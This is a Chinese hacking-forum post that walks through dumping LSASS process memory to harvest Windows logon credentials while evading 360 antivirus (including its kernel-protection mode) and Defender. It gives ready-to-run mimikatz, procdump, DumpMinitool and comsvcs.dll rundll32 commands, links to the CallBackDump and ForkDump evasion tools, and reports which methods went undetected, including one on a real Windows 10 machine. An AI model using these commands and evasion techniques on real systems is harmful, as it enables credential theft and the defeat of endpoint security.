请选择 进入手机版 | 继续访问电脑版
查看: 4467|回复: 0

绕360核晶?Easy!

[复制链接]
  • TA的每日心情

    9 小时前
  • 签到天数: 1436 天

    [LV.10]以坛为家III

    发表于 2022-10-24 10:27:35 | 显示全部楼层 |阅读模式
    测试环境:

    虚拟机:Windows Server 2012 ,腾讯云 Windows Server 2019

    均安装360和defender。

    1. mimikatz

    未做免杀处理
    [AppleScript] 纯文本查看 复制代码
    mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswordsfull" >>1.txtexit

    qw1.jpg
    被360拦截

    2. 白名单文件

    procdump/sqldumper/createdump/DumpMinitool/AvDump/Dump64

    虽然都有白名单,但都过不了行为检测。

    以prodump和DumpMinitool为例
    [AppleScript] 纯文本查看 复制代码
    procdump-accepteula-malsass.exelsass.DMP
    DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full


    但都会被360拦截

    qw2.jpg

    qw3.jpg

    3. 任务管理器右键dump内存

    qw4.jpg
    此操作不会拦截

    接下来mimikatz导入即可。
    [AppleScript] 纯文本查看 复制代码
    mimikatz.exe "sekurlsa::minidumplsass.DMP" "sekurlsa::logonPasswordsfull" exit


    4. rundl132.dll
    [AppleScript] 纯文本查看 复制代码
    powershell-c "rundll32C:\windows\system32\comsvcs.dll, MiniDumppidC:\test\lsass.dmpfull"


    qw5.jpg
    rundl132.dll被拦截

    5. CallBackDump

    下载地址:https://github.com/seventeenman/CallBackDump

    目前过360,defender等

    使用命令:
    [AppleScript] 纯文本查看 复制代码
    CallBackDump.exe to


    qw6.jpg
    再使用dumpXor.exe解密
    [AppleScript] 纯文本查看 复制代码
    dumpXor.exe VM21-6-8.log 1.bin


    qw7.jpg

    [AppleScript] 纯文本查看 复制代码
    mimikatz.exe "sekurlsa::minidump 1.bin" "sekurlsa::logonPasswordsfull" >> 1.txtexit


    qw8.jpg

    360无感。

    虚拟机核晶模式下导出失败。

    qw9.jpg

    qw10.jpg

    CS插件地址:

    https://github.com/0x3rhy/CallBackDump-CS

    6. ForkDump

    下载链接:https://github.com/D4stiny/ForkPlayground/releases/tag/1.0.0

    使用方法:
    [AppleScript] 纯文本查看 复制代码
    ForkDump.exe[dump file name][target process Id]


    qw11.jpg

    [AppleScript] 纯文本查看 复制代码
    mimikatz.exe "sekurlsa::minidumpfork.dmp" "sekurlsa::logonPasswordsfull" >> fork.txtexit

    qw12.jpg

    360无感。

    虚拟机核晶模式导出成功。

    qw13.jpg

    qw14.jpg
    360核晶实机测试

    测试机器:Windows 10

    qw15.jpg

    qw16.jpg

    Dump成功。

    参考链接

    https://www.t00ls.com/articles-66489.html

    https://mp.weixin.qq.com/s/vABhX-ajrOa01cZIGWLIDg

    https://mp.weixin.qq.com/s/67SghGobegFUC2td3az5qQ

    https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass


    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    上海市通信管理局

    江苏省委网信办

    台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    关注微信公众号

    Archiver|手机版|小黑屋|

    GMT+8, 2023-6-7 23:28 , Processed in 0.028837 second(s), 16 queries , Gzip On, MemCache On.

    Powered by Discuz!

    © 2001-2023 Discuz! Team.